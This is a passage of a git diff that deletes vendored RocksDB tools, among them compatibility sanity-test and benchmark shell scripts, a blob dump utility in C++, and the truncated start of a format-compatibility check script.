-ADD ./ldb /rocksdb/tools/ldb
-
-CMD /rocksdb/tools/ldb
diff --git a/thirdparty/rocksdb/tools/auto_sanity_test.sh b/thirdparty/rocksdb/tools/auto_sanity_test.sh
deleted file mode 100755
index 54577ff..0000000
--- a/thirdparty/rocksdb/tools/auto_sanity_test.sh
+++ /dev/null
@@ -1,91 +0,0 @@
-TMP_DIR="${TMPDIR:-/tmp}/rocksdb-sanity-test"
-
-if [ "$#" -lt 2 ]; then
-  echo "usage: ./auto_sanity_test.sh [new_commit] [old_commit]"
-  echo "Missing either [new_commit] or [old_commit], perform sanity check with the latest and 10th latest commits."
-  recent_commits=`git log | grep -e "^commit [a-z0-9]\+$"| head -n10 | sed -e 's/commit //g'`
-  commit_new=`echo "$recent_commits" | head -n1`
-  commit_old=`echo "$recent_commits" | tail -n1`
-  echo "the most recent commits are:"
-  echo "$recent_commits"
-else
-  commit_new=$1
-  commit_old=$2
-fi
-
-if [ ! -d $TMP_DIR ]; then
-  mkdir $TMP_DIR
-fi
-dir_new="${TMP_DIR}/${commit_new}"
-dir_old="${TMP_DIR}/${commit_old}"
-
-function makestuff() {
-  echo "make clean"
-  make clean > /dev/null
-  echo "make db_sanity_test -j32"
-  make db_sanity_test -j32 > /dev/null
-  if [ $? -ne 0 ]; then
-    echo "[ERROR] Failed to perform 'make db_sanity_test'"
-    exit 1
-  fi
-}
-
-rm -r -f $dir_new
-rm -r -f $dir_old
-
-echo "Running db sanity check with commits $commit_new and $commit_old."
-
-echo "============================================================="
-echo "Making build $commit_new"
-git checkout $commit_new
-if [ $? -ne 0 ]; then
-  echo "[ERROR] Can't checkout $commit_new"
-  exit 1
-fi
-makestuff
-mv db_sanity_test new_db_sanity_test
-echo "Creating db based on the new commit --- $commit_new"
-./new_db_sanity_test $dir_new create
-cp ./tools/db_sanity_test.cc $dir_new
-cp ./tools/auto_sanity_test.sh $dir_new
-
-echo "============================================================="
-echo "Making build $commit_old"
-git checkout $commit_old
-if [ $? -ne 0 ]; then
-  echo "[ERROR] Can't checkout $commit_old"
-  exit 1
-fi
-cp -f $dir_new/db_sanity_test.cc ./tools/.
-cp -f $dir_new/auto_sanity_test.sh ./tools/.
-makestuff
-mv db_sanity_test old_db_sanity_test
-echo "Creating db based on the old commit --- $commit_old"
-./old_db_sanity_test $dir_old create
-
-echo "============================================================="
-echo "[Backward Compatibility Check]"
-echo "Verifying old db $dir_old using the new commit --- $commit_new"
-./new_db_sanity_test $dir_old verify
-if [ $? -ne 0 ]; then
-  echo "[ERROR] Backward Compatibility Check fails:"
-  echo "    Verification of $dir_old using commit $commit_new failed."
-  exit 2
-fi
-
-echo "============================================================="
-echo "[Forward Compatibility Check]"
-echo "Verifying new db $dir_new using the old commit --- $commit_old"
-./old_db_sanity_test $dir_new verify
-if [ $? -ne 0 ]; then
-  echo "[ERROR] Forward Compatibility Check fails:"
-  echo "    $dir_new using commit $commit_old failed."
-  exit 2
-fi
-
-rm old_db_sanity_test
-rm new_db_sanity_test
-rm -rf $dir_new
-rm -rf $dir_old
-
-echo "Auto sanity test passed!"
diff --git a/thirdparty/rocksdb/tools/benchmark.sh b/thirdparty/rocksdb/tools/benchmark.sh
deleted file mode 100755
index 1a2c384..0000000
--- a/thirdparty/rocksdb/tools/benchmark.sh
+++ /dev/null
@@ -1,511 +0,0 @@
-#!/usr/bin/env bash
-# REQUIRE: db_bench binary exists in the current directory
-
-if [ $# -ne 1 ]; then
-  echo -n "./benchmark.sh [bulkload/fillseq/overwrite/filluniquerandom/"
-  echo    "readrandom/readwhilewriting/readwhilemerging/updaterandom/"
-  echo    "mergerandom/randomtransaction/compact]"
-  exit 0
-fi
-
-# Make it easier to run only the compaction test. Getting valid data requires
-# a number of iterations and having an ability to run the test separately from
-# rest of the benchmarks helps.
-if [ "$COMPACTION_TEST" == "1" -a "$1" != "universal_compaction" ]; then
-  echo "Skipping $1 because it's not a compaction test."
-  exit 0
-fi
-
-# size constants
-K=1024
-M=$((1024 * K))
-G=$((1024 * M))
-
-if [ -z $DB_DIR ]; then
-  echo "DB_DIR is not defined"
-  exit 0
-fi
-
-if [ -z $WAL_DIR ]; then
-  echo "WAL_DIR is not defined"
-  exit 0
-fi
-
-output_dir=${OUTPUT_DIR:-/tmp/}
-if [ ! -d $output_dir ]; then
-  mkdir -p $output_dir
-fi
-
-# all multithreaded tests run with sync=1 unless
-# $DB_BENCH_NO_SYNC is defined
-syncval="1"
-if [ ! -z $DB_BENCH_NO_SYNC ]; then
-  echo "Turning sync off for all multithreaded tests"
-  syncval="0";
-fi
-
-num_threads=${NUM_THREADS:-16}
-mb_written_per_sec=${MB_WRITE_PER_SEC:-0}
-# Only for tests that do range scans
-num_nexts_per_seek=${NUM_NEXTS_PER_SEEK:-10}
-cache_size=${CACHE_SIZE:-$((1 * G))}
-compression_max_dict_bytes=${COMPRESSION_MAX_DICT_BYTES:-0}
-compression_type=${COMPRESSION_TYPE:-snappy}
-duration=${DURATION:-0}
-
-num_keys=${NUM_KEYS:-$((1 * G))}
-key_size=${KEY_SIZE:-20}
-value_size=${VALUE_SIZE:-400}
-block_size=${BLOCK_SIZE:-8192}
-
-const_params="
-  --db=$DB_DIR \
-  --wal_dir=$WAL_DIR \
-  \
-  --num=$num_keys \
-  --num_levels=6 \
-  --key_size=$key_size \
-  --value_size=$value_size \
-  --block_size=$block_size \
-  --cache_size=$cache_size \
-  --cache_numshardbits=6 \
-  --compression_max_dict_bytes=$compression_max_dict_bytes \
-  --compression_ratio=0.5 \
-  --compression_type=$compression_type \
-  --level_compaction_dynamic_level_bytes=true \
-  --bytes_per_sync=$((8 * M)) \
-  --cache_index_and_filter_blocks=0 \
-  --pin_l0_filter_and_index_blocks_in_cache=1 \
-  --benchmark_write_rate_limit=$(( 1024 * 1024 * $mb_written_per_sec )) \
-  \
-  --hard_rate_limit=3 \
-  --rate_limit_delay_max_milliseconds=1000000 \
-  --write_buffer_size=$((128 * M)) \
-  --target_file_size_base=$((128 * M)) \
-  --max_bytes_for_level_base=$((1 * G)) \
-  \
-  --verify_checksum=1 \
-  --delete_obsolete_files_period_micros=$((60 * M)) \
-  --max_bytes_for_level_multiplier=8 \
-  \
-  --statistics=0 \
-  --stats_per_interval=1 \
-  --stats_interval_seconds=60 \
-  --histogram=1 \
-  \
-  --memtablerep=skip_list \
-  --bloom_bits=10 \
-  --open_files=-1"
-
-l0_config="
-  --level0_file_num_compaction_trigger=4 \
-  --level0_slowdown_writes_trigger=12 \
-  --level0_stop_writes_trigger=20"
-
-if [ $duration -gt 0 ]; then
-  const_params="$const_params --duration=$duration"
-fi
-
-params_w="$const_params \
-          $l0_config \
-          --max_background_compactions=16 \
-          --max_write_buffer_number=8 \
-          --max_background_flushes=7"
-
-params_bulkload="$const_params \
-                 --max_background_compactions=16 \
-                 --max_write_buffer_number=8 \
-                 --max_background_flushes=7 \
-                 --level0_file_num_compaction_trigger=$((10 * M)) \
-                 --level0_slowdown_writes_trigger=$((10 * M)) \
-                 --level0_stop_writes_trigger=$((10 * M))"
-
-#
-# Tune values for level and universal compaction.
-# For universal compaction, these level0_* options mean total sorted of runs in
-# LSM. In level-based compaction, it means number of L0 files.
-#
-params_level_compact="$const_params \
-                --max_background_flushes=4 \
-                --max_write_buffer_number=4 \
-                --level0_file_num_compaction_trigger=4 \
-                --level0_slowdown_writes_trigger=16 \
-                --level0_stop_writes_trigger=20"
-
-params_univ_compact="$const_params \
-                --max_background_flushes=4 \
-                --max_write_buffer_number=4 \
-                --level0_file_num_compaction_trigger=8 \
-                --level0_slowdown_writes_trigger=16 \
-                --level0_stop_writes_trigger=20"
-
-function summarize_result {
-  test_out=$1
-  test_name=$2
-  bench_name=$3
-
-  # Note that this function assumes that the benchmark executes long enough so
-  # that "Compaction Stats" is written to stdout at least once. If it won't
-  # happen then empty output from grep when searching for "Sum" will cause
-  # syntax errors.
-  uptime=$( grep ^Uptime\(secs $test_out | tail -1 | awk '{ printf "%.0f", $2 }' )
-  stall_time=$( grep "^Cumulative stall" $test_out | tail -1  | awk '{  print $3 }' )
-  stall_pct=$( grep "^Cumulative stall" $test_out| tail -1  | awk '{  print $5 }' )
-  ops_sec=$( grep ^${bench_name} $test_out | awk '{ print $5 }' )
-  mb_sec=$( grep ^${bench_name} $test_out | awk '{ print $7 }' )
-  lo_wgb=$( grep "^  L0" $test_out | tail -1 | awk '{ print $8 }' )
-  sum_wgb=$( grep "^ Sum" $test_out | tail -1 | awk '{ print $8 }' )
-  sum_size=$( grep "^ Sum" $test_out | tail -1 | awk '{ printf "%.1f", $3 / 1024.0 }' )
-  wamp=$( echo "scale=1; $sum_wgb / $lo_wgb" | bc )
-  wmb_ps=$( echo "scale=1; ( $sum_wgb * 1024.0 ) / $uptime" | bc )
-  usecs_op=$( grep ^${bench_name} $test_out | awk '{ printf "%.1f", $3 }' )
-  p50=$( grep "^Percentiles:" $test_out | tail -1 | awk '{ printf "%.1f", $3 }' )
-  p75=$( grep "^Percentiles:" $test_out | tail -1 | awk '{ printf "%.1f", $5 }' )
-  p99=$( grep "^Percentiles:" $test_out | tail -1 | awk '{ printf "%.0f", $7 }' )
-  p999=$( grep "^Percentiles:" $test_out | tail -1 | awk '{ printf "%.0f", $9 }' )
-  p9999=$( grep "^Percentiles:" $test_out | tail -1 | awk '{ printf "%.0f", $11 }' )
-  echo -e "$ops_sec\t$mb_sec\t$sum_size\t$lo_wgb\t$sum_wgb\t$wamp\t$wmb_ps\t$usecs_op\t$p50\t$p75\t$p99\t$p999\t$p9999\t$uptime\t$stall_time\t$stall_pct\t$test_name" \
-    >> $output_dir/report.txt
-}
-
-function run_bulkload {
-  # This runs with a vector memtable and the WAL disabled to load faster. It is still crash safe and the
-  # client can discover where to restart a load after a crash. I think this is a good way to load.
-  echo "Bulk loading $num_keys random keys"
-  cmd="./db_bench --benchmarks=fillrandom \
-       --use_existing_db=0 \
-       --disable_auto_compactions=1 \
-       --sync=0 \
-       $params_bulkload \
-       --threads=1 \
-       --memtablerep=vector \
-       --disable_wal=1 \
-       --seed=$( date +%s ) \
-       2>&1 | tee -a $output_dir/benchmark_bulkload_fillrandom.log"
-  echo $cmd | tee $output_dir/benchmark_bulkload_fillrandom.log
-  eval $cmd
-  summarize_result $output_dir/benchmark_bulkload_fillrandom.log bulkload fillrandom
-  echo "Compacting..."
-  cmd="./db_bench --benchmarks=compact \
-       --use_existing_db=1 \
-       --disable_auto_compactions=1 \
-       --sync=0 \
-       $params_w \
-       --threads=1 \
-       2>&1 | tee -a $output_dir/benchmark_bulkload_compact.log"
-  echo $cmd | tee $output_dir/benchmark_bulkload_compact.log
-  eval $cmd
-}
-
-#
-# Parameter description:
-#
-# $1 - 1 if I/O statistics should be collected.
-# $2 - compaction type to use (level=0, universal=1).
-# $3 - number of subcompactions.
-# $4 - number of maximum background compactions.
-#
-function run_manual_compaction_worker {
-  # This runs with a vector memtable and the WAL disabled to load faster.
-  # It is still crash safe and the client can discover where to restart a
-  # load after a crash. I think this is a good way to load.
-  echo "Bulk loading $num_keys random keys for manual compaction."
-
-  fillrandom_output_file=$output_dir/benchmark_man_compact_fillrandom_$3.log
-  man_compact_output_log=$output_dir/benchmark_man_compact_$3.log
-
-  if [ "$2" == "1" ]; then
-    extra_params=$params_univ_compact
-  else
-    extra_params=$params_level_compact
-  fi
-
-  # Make sure that fillrandom uses the same compaction options as compact.
-  cmd="./db_bench --benchmarks=fillrandom \
-       --use_existing_db=0 \
-       --disable_auto_compactions=0 \
-       --sync=0 \
-       $extra_params \
-       --threads=$num_threads \
-       --compaction_measure_io_stats=$1 \
-       --compaction_style=$2 \
-       --subcompactions=$3 \
-       --memtablerep=vector \
-       --disable_wal=1 \
-       --max_background_compactions=$4 \
-       --seed=$( date +%s ) \
-       2>&1 | tee -a $fillrandom_output_file"
-
-  echo $cmd | tee $fillrandom_output_file
-  eval $cmd
-
-  summarize_result $fillrandom_output_file man_compact_fillrandom_$3 fillrandom
-
-  echo "Compacting with $3 subcompactions specified ..."
-
-  # This is the part we're really interested in. Given that compact benchmark
-  # doesn't output regular statistics then we'll just use the time command to
-  # measure how long this step takes.
-  cmd="{ \
-       time ./db_bench --benchmarks=compact \
-       --use_existing_db=1 \
-       --disable_auto_compactions=0 \
-       --sync=0 \
-       $extra_params \
-       --threads=$num_threads \
-       --compaction_measure_io_stats=$1 \
-       --compaction_style=$2 \
-       --subcompactions=$3 \
-       --max_background_compactions=$4 \
-       ;}
-       2>&1 | tee -a $man_compact_output_log"
-
-  echo $cmd | tee $man_compact_output_log
-  eval $cmd
-
-  # Can't use summarize_result here. One way to analyze the results is to run
-  # "grep real" on the resulting log files.
-}
-
-function run_univ_compaction {
-  # Always ask for I/O statistics to be measured.
-  io_stats=1
-
-  # Values: kCompactionStyleLevel = 0x0, kCompactionStyleUniversal = 0x1.
-  compaction_style=1
-
-  # Define a set of benchmarks.
-  subcompactions=(1 2 4 8 16)
-  max_background_compactions=(16 16 8 4 2)
-
-  i=0
-  total=${#subcompactions[@]}
-
-  # Execute a set of benchmarks to cover variety of scenarios.
-  while [ "$i" -lt "$total" ]
-  do
-    run_manual_compaction_worker $io_stats $compaction_style ${subcompactions[$i]} \
-      ${max_background_compactions[$i]}
-    ((i++))
-  done
-}
-
-function run_fillseq {
-  # This runs with a vector memtable. WAL can be either disabled or enabled
-  # depending on the input parameter (1 for disabled, 0 for enabled). The main
-  # benefit behind disabling WAL is to make loading faster. It is still crash
-  # safe and the client can discover where to restart a load after a crash. I
-  # think this is a good way to load.
-
-  # Make sure that we'll have unique names for all the files so that data won't
-  # be overwritten.
-  if [ $1 == 1 ]; then
-    log_file_name=$output_dir/benchmark_fillseq.wal_disabled.v${value_size}.log
-    test_name=fillseq.wal_disabled.v${value_size}
-  else
-    log_file_name=$output_dir/benchmark_fillseq.wal_enabled.v${value_size}.log
-    test_name=fillseq.wal_enabled.v${value_size}
-  fi
-
-  echo "Loading $num_keys keys sequentially"
-  cmd="./db_bench --benchmarks=fillseq \
-       --use_existing_db=0 \
-       --sync=0 \
-       $params_w \
-       --min_level_to_compress=0 \
-       --threads=1 \
-       --memtablerep=vector \
-       --disable_wal=$1 \
-       --seed=$( date +%s ) \
-       2>&1 | tee -a $log_file_name"
-  echo $cmd | tee $log_file_name
-  eval $cmd
-
-  # The constant "fillseq" which we pass to db_bench is the benchmark name.
-  summarize_result $log_file_name $test_name fillseq
-}
-
-function run_change {
-  operation=$1
-  echo "Do $num_keys random $operation"
-  out_name="benchmark_${operation}.t${num_threads}.s${syncval}.log"
-  cmd="./db_bench --benchmarks=$operation \
-       --use_existing_db=1 \
-       --sync=$syncval \
-       $params_w \
-       --threads=$num_threads \
-       --merge_operator=\"put\" \
-       --seed=$( date +%s ) \
-       2>&1 | tee -a $output_dir/${out_name}"
-  echo $cmd | tee $output_dir/${out_name}
-  eval $cmd
-  summarize_result $output_dir/${out_name} ${operation}.t${num_threads}.s${syncval} $operation
-}
-
-function run_filluniquerandom {
-  echo "Loading $num_keys unique keys randomly"
-  cmd="./db_bench --benchmarks=filluniquerandom \
-       --use_existing_db=0 \
-       --sync=0 \
-       $params_w \
-       --threads=1 \
-       --seed=$( date +%s ) \
-       2>&1 | tee -a $output_dir/benchmark_filluniquerandom.log"
-  echo $cmd | tee $output_dir/benchmark_filluniquerandom.log
-  eval $cmd
-  summarize_result $output_dir/benchmark_filluniquerandom.log filluniquerandom filluniquerandom
-}
-
-function run_readrandom {
-  echo "Reading $num_keys random keys"
-  out_name="benchmark_readrandom.t${num_threads}.log"
-  cmd="./db_bench --benchmarks=readrandom \
-       --use_existing_db=1 \
-       $params_w \
-       --threads=$num_threads \
-       --seed=$( date +%s ) \
-       2>&1 | tee -a $output_dir/${out_name}"
-  echo $cmd | tee $output_dir/${out_name}
-  eval $cmd
-  summarize_result $output_dir/${out_name} readrandom.t${num_threads} readrandom
-}
-
-function run_readwhile {
-  operation=$1
-  echo "Reading $num_keys random keys while $operation"
-  out_name="benchmark_readwhile${operation}.t${num_threads}.log"
-  cmd="./db_bench --benchmarks=readwhile${operation} \
-       --use_existing_db=1 \
-       --sync=$syncval \
-       $params_w \
-       --threads=$num_threads \
-       --merge_operator=\"put\" \
-       --seed=$( date +%s ) \
-       2>&1 | tee -a $output_dir/${out_name}"
-  echo $cmd | tee $output_dir/${out_name}
-  eval $cmd
-  summarize_result $output_dir/${out_name} readwhile${operation}.t${num_threads} readwhile${operation}
-}
-
-function run_rangewhile {
-  operation=$1
-  full_name=$2
-  reverse_arg=$3
-  out_name="benchmark_${full_name}.t${num_threads}.log"
-  echo "Range scan $num_keys random keys while ${operation} for reverse_iter=${reverse_arg}"
-  cmd="./db_bench --benchmarks=seekrandomwhile${operation} \
-       --use_existing_db=1 \
-       --sync=$syncval \
-       $params_w \
-       --threads=$num_threads \
-       --merge_operator=\"put\" \
-       --seek_nexts=$num_nexts_per_seek \
-       --reverse_iterator=$reverse_arg \
-       --seed=$( date +%s ) \
-       2>&1 | tee -a $output_dir/${out_name}"
-  echo $cmd | tee $output_dir/${out_name}
-  eval $cmd
-  summarize_result $output_dir/${out_name} ${full_name}.t${num_threads} seekrandomwhile${operation}
-}
-
-function run_range {
-  full_name=$1
-  reverse_arg=$2
-  out_name="benchmark_${full_name}.t${num_threads}.log"
-  echo "Range scan $num_keys random keys for reverse_iter=${reverse_arg}"
-  cmd="./db_bench --benchmarks=seekrandom \
-       --use_existing_db=1 \
-       $params_w \
-       --threads=$num_threads \
-       --seek_nexts=$num_nexts_per_seek \
-       --reverse_iterator=$reverse_arg \
-       --seed=$( date +%s ) \
-       2>&1 | tee -a $output_dir/${out_name}"
-  echo $cmd | tee $output_dir/${out_name}
-  eval $cmd
-  summarize_result $output_dir/${out_name} ${full_name}.t${num_threads} seekrandom
-}
-
-function run_randomtransaction {
-  echo "..."
-  cmd="./db_bench $params_r --benchmarks=randomtransaction \
-       --num=$num_keys \
-       --transaction_db \
-       --threads=5 \
-       --transaction_sets=5 \
-       2>&1 | tee $output_dir/benchmark_randomtransaction.log"
-  echo $cmd | tee $output_dir/benchmark_rangescanwhilewriting.log
-  eval $cmd
-}
-
-function now() {
-  echo `date +"%s"`
-}
-
-report="$output_dir/report.txt"
-schedule="$output_dir/schedule.txt"
-
-echo "===== Benchmark ====="
-
-# Run!!!
-IFS=',' read -a jobs <<< $1
-for job in ${jobs[@]}; do
-
-  if [ $job != debug ]; then
-    echo "Start $job at `date`" | tee -a $schedule
-  fi
-
-  start=$(now)
-  if [ $job = bulkload ]; then
-    run_bulkload
-  elif [ $job = fillseq_disable_wal ]; then
-    run_fillseq 1
-  elif [ $job = fillseq_enable_wal ]; then
-    run_fillseq 0
-  elif [ $job = overwrite ]; then
-    run_change overwrite
-  elif [ $job = updaterandom ]; then
-    run_change updaterandom
-  elif [ $job = mergerandom ]; then
-    run_change mergerandom
-  elif [ $job = filluniquerandom ]; then
-    run_filluniquerandom
-  elif [ $job = readrandom ]; then
-    run_readrandom
-  elif [ $job = fwdrange ]; then
-    run_range $job false
-  elif [ $job = revrange ]; then
-    run_range $job true
-  elif [ $job = readwhilewriting ]; then
-    run_readwhile writing
-  elif [ $job = readwhilemerging ]; then
-    run_readwhile merging
-  elif [ $job = fwdrangewhilewriting ]; then
-    run_rangewhile writing $job false
-  elif [ $job = revrangewhilewriting ]; then
-    run_rangewhile writing $job true
-  elif [ $job = fwdrangewhilemerging ]; then
-    run_rangewhile merging $job false
-  elif [ $job = revrangewhilemerging ]; then
-    run_rangewhile merging $job true
-  elif [ $job = randomtransaction ]; then
-    run_randomtransaction
-  elif [ $job = universal_compaction ]; then
-    run_univ_compaction
-  elif [ $job = debug ]; then
-    num_keys=1000; # debug
-    echo "Setting num_keys to $num_keys"
-  else
-    echo "unknown job $job"
-    exit
-  fi
-  end=$(now)
-
-  if [ $job != debug ]; then
-    echo "Complete $job in $((end-start)) seconds" | tee -a $schedule
-  fi
-
-  echo -e "ops/sec\tmb/sec\tSize-GB\tL0_GB\tSum_GB\tW-Amp\tW-MB/s\tusec/op\tp50\tp75\tp99\tp99.9\tp99.99\tUptime\tStall-time\tStall%\tTest"
-  tail -1 $output_dir/report.txt
-
-done
diff --git a/thirdparty/rocksdb/tools/benchmark_leveldb.sh b/thirdparty/rocksdb/tools/benchmark_leveldb.sh
deleted file mode 100755
index 7769969..0000000
--- a/thirdparty/rocksdb/tools/benchmark_leveldb.sh
+++ /dev/null
@@ -1,185 +0,0 @@
-#!/usr/bin/env bash
-# REQUIRE: db_bench binary exists in the current directory
-#
-# This should be used with the LevelDB fork listed here to use additional test options.
-# For more details on the changes see the blog post listed below.
-#   https://github.com/mdcallag/leveldb-1
-#   http://smalldatum.blogspot.com/2015/04/comparing-leveldb-and-rocksdb-take-2.html
-
-if [ $# -ne 1 ]; then
-  echo -n "./benchmark.sh [fillseq/overwrite/readrandom/readwhilewriting]"
-  exit 0
-fi
-
-# size constants
-K=1024
-M=$((1024 * K))
-G=$((1024 * M))
-
-if [ -z $DB_DIR ]; then
-  echo "DB_DIR is not defined"
-  exit 0
-fi
-
-output_dir=${OUTPUT_DIR:-/tmp/}
-if [ ! -d $output_dir ]; then
-  mkdir -p $output_dir
-fi
-
-# all multithreaded tests run with sync=1 unless
-# $DB_BENCH_NO_SYNC is defined
-syncval="1"
-if [ ! -z $DB_BENCH_NO_SYNC ]; then
-  echo "Turning sync off for all multithreaded tests"
-  syncval="0";
-fi
-
-num_threads=${NUM_THREADS:-16}
-# Only for *whilewriting, *whilemerging
-writes_per_second=${WRITES_PER_SECOND:-$((10 * K))}
-cache_size=${CACHE_SIZE:-$((1 * G))}
-
-num_keys=${NUM_KEYS:-$((1 * G))}
-key_size=20
-value_size=${VALUE_SIZE:-400}
-block_size=${BLOCK_SIZE:-4096}
-
-const_params="
-  --db=$DB_DIR \
-  \
-  --num=$num_keys \
-  --value_size=$value_size \
-  --cache_size=$cache_size \
-  --compression_ratio=0.5 \
-  \
-  --write_buffer_size=$((2 * M)) \
-  \
-  --histogram=1 \
-  \
-  --bloom_bits=10 \
-  --open_files=$((20 * K))"
-
-params_w="$const_params "
-
-function summarize_result {
-  test_out=$1
-  test_name=$2
-  bench_name=$3
-  nthr=$4
-
-  usecs_op=$( grep ^${bench_name} $test_out | awk '{ printf "%.1f", $3 }' )
-  mb_sec=$( grep ^${bench_name} $test_out | awk '{ printf "%.1f", $5 }' )
-  ops=$( grep "^Count:" $test_out | awk '{ print $2 }' )
-  ops_sec=$( echo "scale=0; (1000000.0 * $nthr) / $usecs_op" | bc )
-  avg=$( grep "^Count:" $test_out | awk '{ printf "%.1f", $4 }' )
-  p50=$( grep "^Min:" $test_out | awk '{ printf "%.1f", $4 }' )
-  echo -e "$ops_sec\t$mb_sec\t$usecs_op\t$avg\t$p50\t$test_name" \
-    >> $output_dir/report.txt
-}
-
-function run_fillseq {
-  # This runs with a vector memtable and the WAL disabled to load faster. It is still crash safe and the
-  # client can discover where to restart a load after a crash. I think this is a good way to load.
-  echo "Loading $num_keys keys sequentially"
-  cmd="./db_bench --benchmarks=fillseq \
-       --use_existing_db=0 \
-       --sync=0 \
-       $params_w \
-       --threads=1 \
-       --seed=$( date +%s ) \
-       2>&1 | tee -a $output_dir/benchmark_fillseq.v${value_size}.log"
-  echo $cmd | tee $output_dir/benchmark_fillseq.v${value_size}.log
-  eval $cmd
-  summarize_result $output_dir/benchmark_fillseq.v${value_size}.log fillseq.v${value_size} fillseq 1
-}
-
-function run_change {
-  operation=$1
-  echo "Do $num_keys random $operation"
-  out_name="benchmark_${operation}.t${num_threads}.s${syncval}.log"
-  cmd="./db_bench --benchmarks=$operation \
-       --use_existing_db=1 \
-       --sync=$syncval \
-       $params_w \
-       --threads=$num_threads \
-       --seed=$( date +%s ) \
-       2>&1 | tee -a $output_dir/${out_name}"
-  echo $cmd | tee $output_dir/${out_name}
-  eval $cmd
-  summarize_result $output_dir/${out_name} ${operation}.t${num_threads}.s${syncval} $operation $num_threads
-}
-
-function run_readrandom {
-  echo "Reading $num_keys random keys"
-  out_name="benchmark_readrandom.t${num_threads}.log"
-  cmd="./db_bench --benchmarks=readrandom \
-       --use_existing_db=1 \
-       $params_w \
-       --threads=$num_threads \
-       --seed=$( date +%s ) \
-       2>&1 | tee -a $output_dir/${out_name}"
-  echo $cmd | tee $output_dir/${out_name}
-  eval $cmd
-  summarize_result $output_dir/${out_name} readrandom.t${num_threads} readrandom $num_threads
-}
-
-function run_readwhile {
-  operation=$1
-  echo "Reading $num_keys random keys while $operation"
-  out_name="benchmark_readwhile${operation}.t${num_threads}.log"
-  cmd="./db_bench --benchmarks=readwhile${operation} \
-       --use_existing_db=1 \
-       --sync=$syncval \
-       $params_w \
-       --threads=$num_threads \
-       --writes_per_second=$writes_per_second \
-       --seed=$( date +%s ) \
-       2>&1 | tee -a $output_dir/${out_name}"
-  echo $cmd | tee $output_dir/${out_name}
-  eval $cmd
-  summarize_result $output_dir/${out_name} readwhile${operation}.t${num_threads} readwhile${operation} $num_threads
-}
-
-function now() {
-  echo `date +"%s"`
-}
-
-report="$output_dir/report.txt"
-schedule="$output_dir/schedule.txt"
-
-echo "===== Benchmark ====="
-
-# Run!!!
-IFS=',' read -a jobs <<< $1
-for job in ${jobs[@]}; do
-
-  if [ $job != debug ]; then
-    echo "Start $job at `date`" | tee -a $schedule
-  fi
-
-  start=$(now)
-  if [ $job = fillseq ]; then
-    run_fillseq
-  elif [ $job = overwrite ]; then
-    run_change overwrite
-  elif [ $job = readrandom ]; then
-    run_readrandom
-  elif [ $job = readwhilewriting ]; then
-    run_readwhile writing
-  elif [ $job = debug ]; then
-    num_keys=1000; # debug
-    echo "Setting num_keys to $num_keys"
-  else
-    echo "unknown job $job"
-    exit
-  fi
-  end=$(now)
-
-  if [ $job != debug ]; then
-    echo "Complete $job in $((end-start)) seconds" | tee -a $schedule
-  fi
-
-  echo -e "ops/sec\tmb/sec\tusec/op\tavg\tp50\tTest"
-  tail -1 $output_dir/report.txt
-
-done
diff --git a/thirdparty/rocksdb/tools/blob_dump.cc b/thirdparty/rocksdb/tools/blob_dump.cc
deleted file mode 100644
index 73601f2..0000000
--- a/thirdparty/rocksdb/tools/blob_dump.cc
+++ /dev/null
@@ -1,89 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-#include <getopt.h>
-#include <cstdio>
-#include <string>
-#include <unordered_map>
-
-#include "utilities/blob_db/blob_dump_tool.h"
-
-using namespace rocksdb;
-using namespace rocksdb::blob_db;
-
-int main(int argc, char** argv) {
-  using DisplayType = BlobDumpTool::DisplayType;
-  const std::unordered_map<std::string, DisplayType> display_types = {
-      {"none", DisplayType::kNone},
-      {"raw", DisplayType::kRaw},
-      {"hex", DisplayType::kHex},
-      {"detail", DisplayType::kDetail},
-  };
-  const struct option options[] = {
-      {"help", no_argument, nullptr, 'h'},
-      {"file", required_argument, nullptr, 'f'},
-      {"show_key", optional_argument, nullptr, 'k'},
-      {"show_blob", optional_argument, nullptr, 'b'},
-  };
-  DisplayType show_key = DisplayType::kRaw;
-  DisplayType show_blob = DisplayType::kNone;
-  std::string file;
-  while (true) {
-    int c = getopt_long(argc, argv, "hk::b::f:", options, nullptr);
-    if (c < 0) {
-      break;
-    }
-    std::string arg_str(optarg ? optarg : "");
-    switch (c) {
-      case 'h':
-        fprintf(stdout,
-                "Usage: blob_dump --file=filename "
-                "[--show_key[=none|raw|hex|detail]] "
-                "[--show_blob[=none|raw|hex|detail]]\n");
-        return 0;
-      case 'f':
-        file = optarg;
-        break;
-      case 'k':
-        if (optarg) {
-          if (display_types.count(arg_str) == 0) {
-            fprintf(stderr, "Unrecognized key display type.\n");
-            return -1;
-          }
-          show_key = display_types.at(arg_str);
-        }
-        break;
-      case 'b':
-        if (optarg) {
-          if (display_types.count(arg_str) == 0) {
-            fprintf(stderr, "Unrecognized blob display type.\n");
-            return -1;
-          }
-          show_blob = display_types.at(arg_str);
-        } else {
-          show_blob = DisplayType::kDetail;
-        }
-        break;
-      default:
-        fprintf(stderr, "Unrecognized option.\n");
-        return -1;
-    }
-  }
-  BlobDumpTool tool;
-  Status s = tool.Run(file, show_key, show_blob);
-  if (!s.ok()) {
-    fprintf(stderr, "Failed: %s\n", s.ToString().c_str());
-    return -1;
-  }
-  return 0;
-}
-#else
-#include <stdio.h>
-int main(int argc, char** argv) {
-  fprintf(stderr, "Not supported in lite mode.\n");
-  return -1;
-}
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/tools/check_format_compatible.sh b/thirdparty/rocksdb/tools/check_format_compatible.sh
deleted file mode 100755
index 8016489..0000000
--- a/thirdparty/rocksdb/tools/check_format_compatible.sh
+++ /dev/null
@@ -1,111 +0,0 @@
-#!/usr/bin/env bash
-#
-# A shell script to load some pre generated data file to a DB using ldb tool
-# ./ldb needs to be avaible to be executed.
-#
-# Usage: <SCRIPT> [checkout]
-# `checkout` can be a tag, commit or branch name. Will build using it and check DBs generated by all previous branches (or tags for very old versions without branch) can be opened by it.
-# Return value 0 means all regression tests pass. 1 if not pass.
-
-scriptpath=`dirname $BASH_SOURCE`
-test_dir=${TEST_TMPDIR:-"/tmp"}"/format_compatible_check"
-script_copy_dir=$test_dir"/script_copy"
-input_data_path=$test_dir"/test_data_input/"
-
-mkdir $test_dir || true
-mkdir $input_data_path || true
-rm -rf $script_copy_dir
-cp $scriptpath $script_copy_dir -rf
-
-# Generate four random files.
-for i in {1..6}
-do
-  input_data[$i]=$input_data_path/data$i
